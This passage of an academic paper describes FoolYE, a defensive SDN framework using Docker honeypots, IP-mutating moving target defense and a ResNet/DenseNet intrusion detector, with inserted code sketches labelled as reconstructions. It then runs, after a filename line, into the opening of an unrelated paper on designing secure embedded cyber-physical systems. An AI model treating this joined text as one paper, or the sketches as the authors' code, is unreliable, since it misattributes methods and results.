This paper integrates the network programmability of SDN, cyber deception, MTD, and a deep transfer learning-based IDS to establish an active defense strategy for SDN. Our approach can create a more chaotic and deceptive information environment to mitigate the exposure of critical data in protected targets to attackers. Simultaneously, the malicious actions of hackers gathered in deceptive objects can be used as high-quality and cost-free attack patterns for real-world attack detection.

We organize the remainder of this paper as follows. Section II introduces an overview of deception technology and its support for IDS; related works are also mentioned in this part. Section III outlines the overview of our approach, followed by the detailed architecture of the deception-enhanced framework for intrusion detection. We present the implementation and experiment results in Section IV. Finally, Section V concludes the paper and discusses future directions.

II. RELATED LITERATURE

Over the last decades, the concept of deception has witnessed rising popularity in information security, starting with honeypots for deceiving would-be hackers into a trap. Cyber deception has been receiving tremendous attention from researchers in academia and industry [4]. It brings efficiency in detecting attacks early and puts more obstacles in front of attackers during their reconnaissance phase.
In the work of He Wang [7], SDN is used to build a honeypot system that simulates network topologies and migrates attack traffic. Attackers are attracted to realistic networks simulated by the SDN controller, and attacks are redirected to honeypots. The honeypots are responsible for capturing attack traffic for further analysis. Meanwhile, Decepti-SCADA [8] used Docker to build honeypots that isolate the real system. This minimizes the chance of the honeypot system being compromised and removes cross-platform dependencies. The framework also adopted a modular architecture that makes it easy to add new decoys, and a web interface was built to improve user accessibility. Besides, Dahbul et al. [9] presented fingerprinting techniques used by attackers to identify honeypots. By using several system configurations and customized scripts, they could improve the deceptive ability of honeypots and prevent honeypot detection by attackers. However, this research only focused on layers 3, 4, and 7.

With the explosion of IoT, DDoS is a threat that deserves attention. IoT devices can contain exploitable vulnerabilities that may be used to carry out DDoS attacks. Xupeng Luo et al. [10] proposed an SDN-based moving target defense architecture that changes attack targets. It helped to defend against scanning threats and mitigate DDoS attacks. A new attack was shown by Miao Du and Kun Wang [11] that could detect honeypots in order to disable the protection of a system. To protect SDN from anti-honeypot attacks, they present a pseudo-honeypot strategy in SDN to face DDoS attacks in the IoT environment. The proposed strategy enables network administrators to hide network assets from scanners and defend against DDoS attacks in IoT. Meanwhile, Mengmeng et al. [12] combined cyber deception and moving target defense (MTD) to propose an intrusion prevention technique. SD-IoT networks implementing this technique can extend the lifetime of the system, maintain the availability of services, and increase tolerance to complex attacks. Additionally, Aris et al. [13] formulated a proactive defense mechanism using MTD for Cyber-Physical Systems (CPS). In their case, MTD can continuously alter the parameters of the system, hindering the ability of adversaries to conduct successful reconnaissance of the network. However, their mechanism lacks flexibility in maximizing unpredictability and uncertainty due to the absence of SDN.

Applying ML in IDS is a trend in current research. Taking advantage of cyber-attacks as free labor to gather data for training machine-learning-based IDSs is a proactive defense suggested by Frederico Araujo et al. [14]. Adversarial interactions are selectively lengthened to maximize the collection of threat intelligence. More specifically, they introduced an interactive approach to improve web intrusion detection systems, called DeepDig. With network traffic and traces collected in traps, it built models of legitimate and malicious behaviors. This approach can enhance automated feature extraction for IDS without additional development effort. Motivated by this, our work designs a scheme of adaptive honeypot deployment and MTD in SDN to deceive attackers into spending their time and resources on decoy systems. Leveraging SDN's programmability, our approach can enforce a more flexible deployment strategy of cyber traps, adapted to different network conditions, than Decepti-SCADA and DeepDig.
Also, the network flows extracted from the mirroring server can help to relieve the pressure of labeling attack data for training DL-based IDS models. Deep transfer learning for network-flow-based IDS is another aspect that distinguishes our work from DeepDig.

III. METHODOLOGY

This section gives an overview of the deception framework for IDS, named FoolYE, deployed not only to lure attackers toward decoys, mitigating attack impacts, but also to leverage the free source of attack trails in detecting malicious attempts. As shown in Fig. 1, the proposed architecture of the deception strategy associated with intrusion detection is programmable thanks to the essence of SDN. The controller can remotely observe network statistics and give relevant responses to reconnaissance attacks. Any harmful or suspicious actions can be redirected to a decoy target by instructing flow rules into the OpenFlow switches. Specifically, many types of honeypots are prepared as deception templates in the Trap Inventory for easy deployment in network segments. Meanwhile, the Security Orchestrator plays the role of choosing the type of honeypot to be installed. It also determines the method of establishing cyber traps to mislead attackers into believing that the information collected during the scanning phase is real. Eventually, the attack trails or malicious actions logged in the honeypots or decoys are gathered and utilized as a free source for maintaining up-to-date intelligence in the intrusion detection system (IDS). The IDS is an engine implementing machine learning algorithms for detecting cyber threats. The Extractor produces network flow features from data gathered from the SDN controller and the honeypots, then sends them to the ML-based IDS for analysis. To prevent network reconnaissance from inside or outside, MTD is a plugin of the SDN controller; it is responsible for mapping the real IP address of a host to a virtual IP address. The virtual IP address is mutated periodically according to the idea of CONCEAL [15].

Fig. 1. FoolYE - a deception-enhanced IDS in an SDN-enabled network.

Algorithm 1 gives the workflow of honeypot deployment in FoolYE, a flexible deception-supported IDS framework, aiming to create significant confusion in discovering and targeting cyber assets in SDN-aware networks.

A. Intrusion Detection Engine

Playing an important role in recognizing malicious traffic flows in the network, the intrusion detection engine leverages ML algorithms to classify new incoming flows entering the operational network. This engine requires a massive number of traffic flow records for training before it can predict the attack label. These records can come from public datasets or from honeypot systems deployed in the network. Regarding the DL models used in the ML-based IDS, we utilize two state-of-the-art image recognition models, ResNet50 and DenseNet161, pretrained on the ImageNet dataset. The deep transfer learning strategy is adopted in both models to reduce the training time of the neural networks, as depicted in Fig. 2. We use feature extraction as the transfer learning technique to leverage the model knowledge of a previous domain in a new one. The last fully connected (FC) layer of each model is replaced with a layer containing 2 classes (normal and abnormal) instead of the 1000 ImageNet classes.
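A minimal PyTorch sketch of this feature-extraction transfer-learning setup is given below. It is an illustrative reconstruction rather than the authors' code: the training loop, data loader, and the use of the Section IV.A hyperparameters (10 epochs, learning rate 0.001, Adam, cross entropy) are assumptions. DenseNet161 would be adapted analogously by replacing its classifier layer.

import torch
import torch.nn as nn
from torchvision import models

# Load ResNet50 pretrained on ImageNet and freeze its backbone, so only the
# new classification head is updated during training (feature extraction).
model = models.resnet50(pretrained=True)
for param in model.parameters():
    param.requires_grad = False

# Replace the original 1000-class fully connected layer with a 2-class one
# (normal vs. abnormal), as described for the FoolYE detector.
model.fc = nn.Linear(model.fc.in_features, 2)

criterion = nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(model.fc.parameters(), lr=0.001)

def train_one_epoch(loader):
    """loader is assumed to yield (image_batch, label_batch) pairs, where the
    images are the RGB encodings of flow records described in Section III.A."""
    model.train()
    for images, labels in loader:
        optimizer.zero_grad()
        loss = criterion(model(images), labels)
        loss.backward()
        optimizer.step()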
The parameters of the pretrained layers in ResNet50 and DenseNet161 are kept unchanged during the training phase; training then updates only the new, randomly initialized last layer according to the intrusion detection dataset.

Fig. 2. Training the detector by deep transfer learning on the ResNet50 model.

Based on the recommendations of a flow-based IDS study [16] on the CICIDS2017 dataset [17], we choose 7 of the 80 flow features in the CICIDS2018 dataset [18] for the ML-based IDS, because these SDN flow features can be easily obtained by the controller while sharing the same descriptions as in the CICIDS2017 dataset [17]. These features are destination port, flow duration, fwd packet length mean, flow bytes/s, flow packets/s, flow IAT mean, and fwd packets/s. Labels of the dataset are converted into two types: value 0 is benign and 1 is likely an attack. The values of the flow features in the dataset have several types, such as integer, string, and float. Min-max normalization is performed to normalize them into the range [0, 1]. Each normalized value x_new is then converted into an integer using the formula x_new x 10^2. After that, the task of converting network records into images is conducted to feed the input of the two mentioned DL models. To achieve this, we utilize the method proposed by Zhipeng Li [19] to transform each integer value into a corresponding binary value. This method ensures that all values fall into the range from 0 to 255, so that each can be mapped onto an image pixel. The output of the method from [19] for each feature value is an 8-bit binary number. Next, the 8-bit elements are concatenated into a single bit array of length l_array. To simplify the process of image conversion, we aim to obtain a square RGB image to represent a flow for the IDS. Based on the characteristics of a color image, the l_array value can be used to determine the size s of this target image, as in (1):

l_array = 3 x s^2 (1)

Moreover, in case s receives a decimal value, 0 bits will be added to the end of the bit array to make s an integer value. This new array is then divided into 3 sub-arrays of the same length. The length of s^2 allows them to be transformed into corresponding 2-dimensional arrays serving as the color layers of an RGB image.

Algorithm 1. Trap deployment workflow of FoolYE
Input: inventory: list of honeypot images in the Trap Inventory; templates: honeypot image to establish; mtdIPPool: a list of fake IPs for moving target defense; deployMode: the mode of deploying honeypots; period: period to change traps
Output: traps: list of honeypots that is deployed
1: Initialize timer
2: # Initialize traps according to the deployMode
   traps <- inventory.create(templates)
3: if (timer mod period == 0)
4:     traps <- IP mutation on topology(mtdIPPool)
5:     if (deployMode == MOVING)
6:         # Change traps to other types from inventory and templates
           traps <- changeType(inventory, templates)
7: return traps

B. Cyber Deception, Trap Inventory and Security Orchestrator

One of the main objectives of cyber deception is to cover the identity of the cyber assets. Thus, in FoolYE, we use various honeypots to draw the attacker away from critical resources and to detect malicious actions early in the cybersecurity kill chain. To automate the deployment of decoys, FoolYE is supported by two modules, the Trap Inventory and the Security Orchestrator.
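Before detailing these two modules, here is an illustrative NumPy sketch of the flow-to-image conversion described in Section III.A above. The x100 scaling follows the formula as reconstructed from the text, and the zero-padding policy and example feature values are assumptions; the authors' exact implementation may differ in these details.

import math
import numpy as np

def flow_to_rgb(features, mins, maxs):
    """Convert one flow record (7 features) into a square RGB image array."""
    feats = np.asarray(features, dtype=float)
    norm = (feats - mins) / (maxs - mins + 1e-12)        # min-max to [0, 1]
    ints = np.clip((norm * 100).astype(int), 0, 255)     # 8-bit integers

    bits = []
    for v in ints.tolist():                              # 8 bits per feature
        bits.extend(int(b) for b in format(v, "08b"))

    side = math.ceil(math.sqrt(len(bits) / 3))            # l_array = 3 * s^2
    padded = bits + [0] * (3 * side * side - len(bits))   # zero-pad the tail
    return np.array(padded, dtype=np.uint8).reshape(3, side, side)

# Example: 7 features -> 56 bits -> s = ceil(sqrt(56/3)) = 5 -> a 3x5x5 image.
img = flow_to_rgb([80, 1.2e6, 40.0, 5e4, 120.0, 1e4, 60.0],
                  mins=np.zeros(7), maxs=np.full(7, 2e6))
print(img.shape)  # (3, 5, 5)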
Firstly, the Trap Inventory stores and manages traps packaged as Docker images. These decoy objects are deployed in the form of Docker containers running honeypots. Meanwhile, the Security Orchestrator is built for deploying honeypots or decoys and observing malicious actions in these cyber traps. On the machine assigned as a decoy, a honeypot image from the Docker Registry [20] is pulled and deployed onto hosts randomly by Ansible through an SSH connection. This approach facilitates the flexibility of a cyber deception system: we can deploy or revoke traps and then run them on other decoy hosts. We design two types of mechanisms, called fixed trap and moving trap.

- Fixed trap: honeypots are permanently deployed on a host in the network. We can choose a type of honeypot or use a random mechanism to deploy cyber traps.
- Moving trap: honeypots are deployed automatically in the network. After a certain time, the FoolYE framework conducts a moving strategy to renew decoys by changing the honeypot type or the deployment platform (hosts).

C. Moving Target Defense

Moving target defense (MTD), one of the game-changing themes to alter the asymmetric situation between attacks and defenses in cybersecurity, facilitates proactive defense strategies that are diverse, that continually shift attack surfaces in some fashion, and that change over time. In addition to cyber deception, we also apply an MTD strategy aiming to impede adversaries from targeting and executing successful attacks by increasing complexity, chaos, and cost for attackers. It can help to limit the exposure of vulnerabilities and opportunities for attack, and to deceive adversaries in real time. Specifically, there is a list of available IP addresses in the network topology that are mutated into virtual IP addresses by the MTD module. This MTD-based proactive technique is integrated with the SDN controller to help the switches understand which virtual IP addresses map to which real ones. The mapping between real and virtual IP addresses is repeatedly re-computed after a certain period of x seconds. The changes in IP invalidate the reconnaissance information gathered by attackers.

IV. EXPERIMENTS

This section provides the details of the SDN testbed settings, followed by the experiment results for different scenarios.

A. Training the ML-Based IDS

To train the ML-based IDS, we utilize a physical machine with 64 GB of RAM, an Intel i7 6700HQ CPU, and 3x GTX 1050 Ti 4 GB GPUs. We choose the CICIDS2018 dataset [18] with DDoS attacks to evaluate the performance of the ML-based IDS. Specifically, four .CSV files in this dataset (Thurs-15-02-2018, Fri-16-02-2018, Tues-20-02-2018, Wed-21-02-2018) are combined and then split into a train set and a test set with a ratio of 80% to 20%, respectively. Two outstanding neural networks, ResNet50 and DenseNet161, are deployed with PyTorch [21]. They are trained for 10 epochs with a learning rate of 0.001, cross entropy as the loss function, and the Adam optimizer. The training results after 10 epochs are shown in Table I. In the future, malicious activities of adversaries collected from decoys can be utilized to train and update the knowledge of the IDS about real-world attack patterns in the network.

B. Experiment Settings

In the experimental environment, we use 2 virtual machines (VMs) running Ubuntu 18.04 to construct the SDN testbed and other components. Table II illustrates the configuration of the components in our framework. Initially, the SDN testbed, as depicted in Fig.
3, is built with the Ryu controller [22] and Containernet [23]. Containernet is a Mininet variant [24] that allows Docker containers to be emulated as hosts in SDN-enabled networks. The network topology comprises 4 OpenFlow-supported switches (Open vSwitch), connecting 8, 12, or 16 hosts in the different experimental tests. In terms of cyber deception, we use 3 types of honeypots, namely Opencanary [25], Cowrie [26], and Dionaea [27], to deploy decoy objects in the network. They are packed into the Docker images shown in Table III, supporting easy installation as containers in the decoy zone later. Note that, although only 3 types of honeypots are deployed in this experiment, hundreds of other decoy Docker images can be created. We use a Playbook in Ansible [28] to deploy traps automatically with the two mechanisms of fixed trap and moving trap. In the fixed type, the administrator chooses a honeypot to be installed at a specific location for luring attackers until the administrator turns it off or changes it to another type. On the contrary, in the moving strategy, various types of traps are selected and automatically deployed on different deceptive hosts; they are then continually changed to another type after a scheduled period.

TABLE I. RESULTS OF DEEP TRANSFER LEARNING MODELS ON CICIDS2018
Model          Performance on Test Set
               Accuracy (%)    F1-score (%)
ResNet50       99.79           99.8
DenseNet161    99.44           99.5

TABLE II. EXPERIMENTAL SETTINGS ON VIRTUAL MACHINES
                         VM 1                                    VM 2
Hardware configuration   Intel(R) Xeon(R) CPU E5-2660 2.0GHz,    Intel(R) Xeon(R) CPU E5-2660 2.0GHz,
                         160GB HDD, 16GB RAM                     100GB HDD, 4GB RAM
Application              Ryu controller, MTD module,             Containernet, Feature extraction module,
                         RabbitMQ, ML-based IDS                  Ansible, Snort3

Fig. 3. Experimental SDN-enabled network testbed.

For the ML-based IDS, ResNet50 and DenseNet161 are used as the prediction models. Each of them is loaded in the IDS, which is programmed in Python. The network traffic is captured and its features extracted by the TCPDump_and_CICFlowMeter tool [29] and sent asynchronously via RabbitMQ [30] to the ML-based IDS to obtain the classification result. In addition, MTD is programmed as a module of the SDN controller. Therein, real IP addresses are available to hosts but hidden from outside attackers to avoid reconnaissance attacks from the outside. In contrast, a virtual IP address is an IP representing a host, and it is changed continuously. To meet the demand for monitoring and alerting in the cyber deception system, we utilize Snort [31] on the host VM playing the role of the Security Orchestrator. Snort rules are installed to monitor network traffic sent from the cyber deception system, namely DDoS attacks and SSH connection attempts. Any security event violating the security policy established by the Snort rules will produce an alert for the network security administrator.

TABLE III. COMPRESSED SIZE AND PULLED SIZE OF THE IMAGES CONTAINING THE TRAPS
                  Opencanary   Cowrie      Dionaea
Compressed size   206.67 MB    114.66 MB   59.87 MB
Pulled size       632 MB       432 MB      194 MB

C. Experiment Results

To evaluate the built-in ability to identify attacks, we perform a DoS attack on a web server with service port 80 by sending 100 HTTP requests per second. For the assessment of attack detection capabilities, we use statistical methods.
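As a brief aside to these settings, the following sketch illustrates the kind of real-to-virtual IP remapping performed by the MTD module of Section III.C. The class, the address pool, and the 60-second period are illustrative assumptions, not the authors' controller code; a real deployment would additionally rewrite flow rules in the OpenFlow switches.

import random
import time

class MtdMapper:
    """Illustrative real<->virtual IP remapping in the spirit of Section III.C.
    Only the mapping logic is shown; flow-rule installation is omitted."""

    def __init__(self, real_ips, virtual_pool, period_s=60):
        self.real_ips = list(real_ips)
        self.virtual_pool = list(virtual_pool)
        self.period_s = period_s
        self.mutate()

    def mutate(self):
        """Assign each real host a fresh, distinct virtual IP from the pool."""
        chosen = random.sample(self.virtual_pool, len(self.real_ips))
        self.real_to_virtual = dict(zip(self.real_ips, chosen))
        self.last_mutation = time.time()

    def resolve(self, virtual_ip):
        """Translate a virtual destination back to the real host, if any."""
        for real, virt in self.real_to_virtual.items():
            if virt == virtual_ip:
                return real
        return None

    def tick(self):
        """Call periodically; re-randomise once the mutation period expires."""
        if time.time() - self.last_mutation >= self.period_s:
            self.mutate()

mapper = MtdMapper(real_ips=["10.0.0.1", "10.0.0.2"],
                   virtual_pool=[f"10.0.99.{i}" for i in range(1, 50)],
                   period_s=60)
print(mapper.real_to_virtual)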
For every 100 records received, the ML-based IDS calculates the percentage of attack flows in the total network traffic. Approximately 60% of the attack flows can be detected by both the ResNet50 and the DenseNet161 model in this test. Meanwhile, the average flow-record prediction rates of ResNet50 and DenseNet161 are around 1.93 records/s and 2.12 records/s, respectively. The number of records processed per second in this evaluation is proportional to the hardware configuration, because the recognition speed of the model is greatly affected by the CPU, RAM, or GPU of the VM.

When it comes to the deployment time of traps, we take 30 measurements and record the time in seconds. The experiments are performed with 2, 3, and 4 traps, and the results for each group of traps are shown in Table IV. The time consumption of trap deployment includes the time spent on host selection, pulling honeypot images from the Docker registry (storage), and starting containers for all honeypots in the group.

To show the effectiveness of network monitoring on deployed honeypots, we conduct a test case on the Opencanary trap by logging and analyzing the attacker's actions. An adversary performs a scanning attack and obtains the active services running on a specific host. Following that, they attempt to explore and exploit the fake target built by Opencanary. Such trails coming from decoys are monitored and shown in real time in the view of the Security Orchestrator machine, as depicted in Fig. 4.

TABLE IV. TIME CONSUMPTION OF HONEYPOT DEPLOYMENT IN 30 EXPERIMENTS
Number of honeypots   Maximum time (s)   Minimum time (s)   Average time (s)
2                     200.2              136.8              163.2
3                     330.5              159.9              236.7
4                     468.6              166.1              268.2

Fig. 4. Log monitoring from the Opencanary honeypot.

TABLE V. TIME CONSUMPTION AND NUMBER OF DISCOVERED HOSTS FOR THE SCANNING PROCESS WITH AND WITHOUT MTD
              MTD                                   Non-MTD
Total hosts   Scanning time (s)  Discovered hosts   Scanning time (s)  Discovered hosts
8             5524               7                  969                8
12            6948               9                  1059               12
16            9837               13                 1206               16

Regarding the performance of the MTD mechanism in changing attack surfaces, we use the nmap tool [32] to scan the network both with and without MTD integration. The results, as illustrated in Table V, show that with the MTD strategy in force, the attacker not only needs far more time to finish reconnaissance but also misses useful network information.

V. CONCLUSION AND FUTURE WORKS

To improve the effectiveness of cyber defense in SDN-enabled networks, we introduce a deception-enhanced intrusion detection system, named FoolYE, for deploying traps and decoys to lure attackers. By leveraging the essence of SDN, these traps are continually created, monitored, and easily changed to create more deceptive attack surfaces. With the matrix of decoys and Moving Target Defense, the network intruder has to spend more time and effort on counterfeit assets, while security analysts are alerted early about the attacker's presence in the network. Furthermore, the behaviors of adversaries in the decoy systems are collected for training the IDS to meet the requirement of detecting skillful cyberattacks in real-world scenarios. In the future, we intend to utilize honey patches, which turn real assets into rich-environment traps. Next, evaluation by red teams is considered to further validate the feasibility of our framework in real-world scenarios.
ACKNOWLEDGMENT

This research is funded by Vietnam National University Ho Chi Minh City (VNU-HCM) under grant number DS2022-26-02. Phan The Duy was funded by Vingroup JSC and supported by the Domestic Master, PhD Scholarship Programme of Vingroup Innovation Foundation (VINIF), Institute of Big Data, code VINIF.2021.TS.152.

REFERENCES
[1] P. P. Ray and N. Kumar, "SDN/NFV architectures for edge-cloud oriented IoT: A systematic review," Computer Communications, vol. 169, 2021.
[2] I. Alam, K. Sharif, F. Li, Z. Latif, M. M. Karim, S. Biswa, B. Nour and Y. Wang, "A Survey of Network Virtualization Techniques for Internet of Things Using SDN and NFV," ACM Computing Surveys, 2020.
[3] W. Sun, "The Art of War," in Mens sana, Knaur, München, 2001.
[4] D. Fraunholz, S. D. Anton, C. Lipps, D. Reti, D. Krohmer, F. Pohl, M. Tammen and H. D. Schotten, "Demystifying Deception Technology: A Survey," arXiv:1804.06196, 2018.
[5] G.-l. Cai, B.-s. Wang, W. Hu and T.-z. Wang, "Moving target defense: state of the art and characteristics," Frontiers Inf Technol Electronic Eng, vol. 17, pp. 1122-1153, 2016.
[6] S. Sengupta, A. Chowdhary, A. Sabur, A. Alshamrani, D. Huang and S. Kambhampati, "A Survey of Moving Target Defenses for Network Security," IEEE Communications Surveys & Tutorials, vol. 22, 2020.
[7] H. Wang and B. Wu, "SDN-based hybrid honeypot for attack capture," in 2019 IEEE 3rd ITNEC, 2019.
[8] N. Cifranic, R. A. Hallman, J. Romero-Mariona, B. Souza, T. Calton and G. Coca, "Decepti-SCADA: A cyber deception framework for active defense of networked critical infrastructures," Internet of Things, vol. 12, 2020.
[9] R. Dahbul, C. Lim and J. Purnama, "Enhancing Honeypot Deception Capability Through Network Service Fingerprinting," Journal of Physics Conference Series, 2017.
[10] X. Luo, Q. Yan, M. Wang and W. Huang, "Using MTD and SDN-based Honeypots to Defend DDoS Attacks in IoT," in ComComAp, 2019.
[11] M. Du and K. Wang, "An SDN-Enabled Pseudo-Honeypot Strategy for Distributed Denial of Service Attacks in Industrial Internet of Things," IEEE Transactions on Industrial Informatics, vol. 16, 2019.
[12] M. Ge, J.-H. Cho, D. S. Kim, G. Dixit and I.-R. Chen, "Proactive Defense for Internet-of-Things: Integrating Moving Target Defense with Cyberdeception," arXiv preprint arXiv:2005.04220, 2020.
[13] A. Kanellopoulos and K. G. Vamvoudakis, "A Moving Target Defense Control Framework for Cyber-Physical Systems," IEEE Transactions on Automatic Control, vol. 65, no. 3, pp. 1029-1043, 2020.
[14] F. Araujo, G. Ayoade, K. Al-Naami, Y. Gao, K. W. Hamlen and L. Khan, "Improving intrusion detectors by crook-sourcing," in ACSAC, 2019.
[15] Q. Duan, E. Al-Shaer, M. Islam and H. Jafarian, "CONCEAL: A Strategy Composition for Resilient Cyber Deception - Framework, Metrics and Deployment," in 2018 IEEE CNS, Beijing, China, 2018.
[16] T. Tang, D. McLernon, L. Mhamdi, S. Zaidi and M. Ghogho, "Intrusion Detection in SDN-Based Networks: Deep Recurrent Neural Network Approach," in M. Alazab and M. Tang (eds), Deep Learning Applications for Cyber Security, Advanced Sciences and Technologies for Security Applications, Springer, Cham, 2019.
[17] I. Sharafaldin and A. H. Lashkari, "A Detailed Analysis of the CICIDS2017 Data Set," in Communications in Computer and Information Science, vol. 977, CCIS, 2019.
[18] I. Sharafaldin, A. H. Lashkari and A. A. Ghorbani, "Toward Generating a New Intrusion Detection Dataset and Intrusion Traffic Characterization," in 4th ICISSP, Portugal, 2018.
[19] Z. Li, Z. Qin, K.
Huang, X. Yang and S. Ye, "Intrusion Detection Using Convolutional Neural Networks for Representation Learning," in Lecture Notes in Computer Science, vol. 10638, LNCS.
[20] "Docker Registry," [Online]. Available: https://docs.docker.com/registry/.
[21] "PyTorch," [Online]. Available: https://pytorch.org/.
[22] "Ryu SDN Controller," [Online]. Available: https://ryu-sdn.org/.
[23] "Containernet: Use Docker containers as hosts in Mininet emulations," [Online]. Available: https://containernet.github.io/.
[24] "An Instant Virtual Network on your Laptop (or other PC)," Mininet, [Online]. Available: http://mininet.org/.
[25] "OpenCanary," [Online]. Available: https://opencanary.readthedocs.io/en/latest/.
[26] "Cowrie," [Online]. Available: https://cowrie.readthedocs.io/en/latest/index.html.
[27] "Dionaea honeypot," [Online]. Available: https://dionaea.readthedocs.io/.
[28] "Playbook in Ansible," [Online]. Available: https://docs.ansible.com/ansible/latest/user_guide/playbooks_intro.html.
[29] "TCPDUMP_and_CICFlowMeter," [Online]. Available: https://github.com/iPAS/TCPDUMP_and_CICFlowMeter.
[30] "RabbitMQ," RabbitMQ || VMWare, Dec 2020. [Online]. Available: https://www.rabbitmq.com/.
[31] "Snort - Network Intrusion Detection & Prevention System," [Online]. Available: https://www.snort.org/.
[32] "Nmap: the Network Mapper - Free Security Scanner," [Online]. Available: https://nmap.org/.
Design_lifecycle_for_secure_cyber-physical_systems_based_on_embedded_devices.pdf
The paper is devoted to the issues of designing secure cyber-physical systems based on embedded devices. It aims to develop a generalized approach to the design of secure systems based on embedded devices. Current approaches to designing secure software and embedded devices are analyzed. A design lifecycle for secure embedded device systems is proposed, and its advantages and disadvantages are analyzed. The correctness of the design lifecycle for secure embedded device systems is validated by its use in the development of an integrated cyber-physical security system.
The 9th IEEE International Conference on Intelligent Data Acquisition and Advanced Computing Systems: Technology and Applications, 21-23 September, 2017, Bucharest, Romania.

Design Lifecycle for Secure Cyber-Physical Systems based on Embedded Devices. Dmitry Levshun, Andrey Chechulin, and Igor Kotenko. St. Petersburg Institute for Informatics and Automation of Russian Academy of Sciences (SPIIRAS), 39, 14th Liniya, St. Petersburg, Russia; St. Petersburg National Research University of Information Technologies, Mechanics and Optics (ITMO University), 49, Kronverkskiy prospekt, Saint-Petersburg, Russia. {levshun, chechulin, ivkote}@comsec.spb.ru, http://comsec.spb.ru

Keywords: cyber-physical systems, embedded devices, design of secure cyber-physical systems, security of embedded device systems.

I. INTRODUCTION

Nowadays the integrated approach to providing cyber-physical security of critical infrastructures is widespread. This approach combines heterogeneous sources of events of the physical and cyber levels within one system and ensures the resilience of such systems to attacks on them [1]. It allows detecting security incidents, attack scenarios, and anomalous activity, which previously was possible only at the investigation stage, as well as responding to them in real time. In addition, there are national and international standards for the development of secure software, as well as solutions from leading companies in the domain of information technology. Besides that, frameworks for designing software architectures that take into account the need to ensure their security are widespread.

We should note that the functionality of embedded devices is determined not only by software but also by hardware. The connection between the software part of the device, on the one hand, and the hardware, on the other, leads to additional constraints which have a significant effect on the design process of such devices. This means that existing solutions for building secure software are not fully applicable to the design of secure systems based on embedded devices, and therefore they need revision. In practice, the component approach to the development of embedded devices is also widely used. It is implemented, for example, in the context of Arduino, Raspberry Pi, Beaglebone, and Intel Galileo. For this approach there are techniques for designing secure embedded devices which allow, at the design stage of an embedded device, identifying the list of possible attacks that may affect the device, in accordance with the selected intruder model and the software and hardware components used [2]. However, the use of such methods and further consolidation within a single system combining multiple secure embedded devices does not yield a secure system, due to the need to consider the emergent properties of the system. This means that these techniques are also not fully applicable to the task, and they need revision as well. In addition, in recent years, research in the field of methodologies for the design and verification of networked embedded systems [3] has spread widely. The main purpose of these techniques is to provide developers of networked embedded systems with information about the applicability of certain interfaces and data transfer protocols to ensure an appropriate level of reliability of the final system.
The security of embedded devices is not an immediate goal of these methods; however, some aspects of security are considered when selecting interfaces and data transfer protocols. It is also important to note that methods of this type can ensure reliability only for isolated embedded devices, without considering their interaction with remote servers, workstations, web services, etc. This means that the methodology of design and verification for networked embedded systems is not applicable to the task of providing security of non-isolated systems based on embedded devices, and therefore it also needs to be extended. To summarize, at the moment there is no single generalized approach for solving the problem of designing secure systems based on embedded devices, and existing solutions have drawbacks and need improvement. This paper aims to develop a generalized approach to the design of secure systems based on embedded devices. The main contribution of this paper is to develop a unified technique to design secure systems based on embedded devices, taking into account the emergent properties of the protected system. The novelty of the proposed approach is in the combination of solutions for the development of secure software with techniques for the design of secure embedded devices in a single design procedure. Emergent properties are considered here as the properties that appear in the system due to the interfaces and data transmission channels between elements of the system. The paper presents the main elements of the research and development performed; its structure is organized as follows. The second section discusses the main results of previously fulfilled relevant research. The third section provides a general description of the developed approach. The correctness of the design lifecycle for embedded device systems is verified by its use in the development of an integrated cyber-physical security system specified in the fourth section. Advantages and disadvantages of the approach are analyzed in the fifth section. The main conclusions and further research directions are discussed in the sixth section.

II. RELATED WORK

As one of the possible solutions for developing secure software, let us consider a solution from Microsoft, namely the Microsoft Security Development Lifecycle (Microsoft SDL) [4]. The approach of the company is divided into seven key sequential phases: training, requirements, design, implementation, verification, release and response. The fundamental phases from the point of view of the development of a secure system based on embedded devices are requirements and design. This is due to the fact that the immediate task of the design technique is providing input on security requirements, quality gates/bug bars, and security and privacy risk assessments in the requirements phase. In addition, an equally important goal of the technique is providing input data on design requirements and the threat model for the design phase. Another possible solution for developing secure software is the solution from Cisco, the Cisco Secure Development Lifecycle (Cisco SDL) [5]. The company's approach consists of six sequential phases: product security requirements, third party security, secure design, secure coding, static analysis, and vulnerability testing.
From the point of view of the development of a secure system based on embedded devices, the most important phases are product security requirements and secure design. In the security requirements phase, a gap analysis is done, whose main task is to identify the changes necessary in the system to achieve a secure state. In the secure design phase, threat modeling is performed to make assumptions about possible threats and ways to mitigate them. In addition, one of the interesting features of Cisco SDL compared to Microsoft SDL is the third party security phase, aimed at identifying possible threats from third party software, as well as ensuring registration and timely updates of this software.

To develop complex enterprise-level software systems, frameworks of the appropriate level are usually used. One such framework is the Zachman Framework [6]. In this framework, two classical approaches for the solution of analytical problems are used. The first approach is based on answering six key questions: what, how, when, who, where and why. It is important to note that, based on the answers to these questions, one can form a holistic description of rather complex processes. The second approach consists of six consecutive development phases, namely identification, definition, representation, specification, configuration and instantiation. So the Zachman Framework has a 6x6 matrix format in which columns correspond to the question words and rows are the phases of development. Each cell in the resulting table represents a corresponding simple model. The application of the Zachman Framework to the design of secure systems based on embedded devices allows organizing the business logic of the system, which provides the ability to form the corresponding security requirements.

One possible approach for designing secure embedded devices is presented in papers [7, 8]. The essence of the technique proposed in these papers is to identify and take into account, already in the design phase, the list of possible harmful effects to which the embedded device may be subject, in accordance with the selected intruder model and the hardware and software components used. In this approach, the protection tools are a direct part of the embedded device, ensuring its security. Let us consider the main phases of the specified technique in more detail: (1) definition of functional requirements for the embedded device; (2) definition of non-functional requirements for the embedded device; (3) identification of the set of alternatives of component composition of the embedded device in accordance with the functional requirements; (4) choice of the optimal component composition of the embedded device from the point of view of non-functional requirements; (5) identification of the list of possible harmful impacts on the embedded device based on static testing. Thus, if the security level of the embedded device is sufficient, one can proceed to the stage of direct development. Otherwise, one should return to the first step and review the functional requirements. Unfortunately, a system based on the interaction of embedded devices, each of which is designed in accordance with the methodology for designing secure embedded devices, cannot be considered secure, due to unique emergent properties occurring during the operation of the system. In order to develop a system of secure communications between embedded devices, a variety of techniques are also used.
One example of such techniques was presented within the framework of the European research project SecFutur [9], devoted to the development of systems with embedded devices. In this project it was proposed to use topological approaches for building secure channels for data transmission between embedded devices. To solve this problem, the security of the path between two points in a network graph was calculated based on numeric security values assigned to the nodes. This characteristic then served as the basis for changes to the requirements on the embedded devices. However, this approach does not take into account the interaction of systems of embedded devices with external systems (or considers the interaction only from the embedded devices' side), which may cause problems in the integrated protection of a network containing embedded devices.

III. GENERAL APPROACH

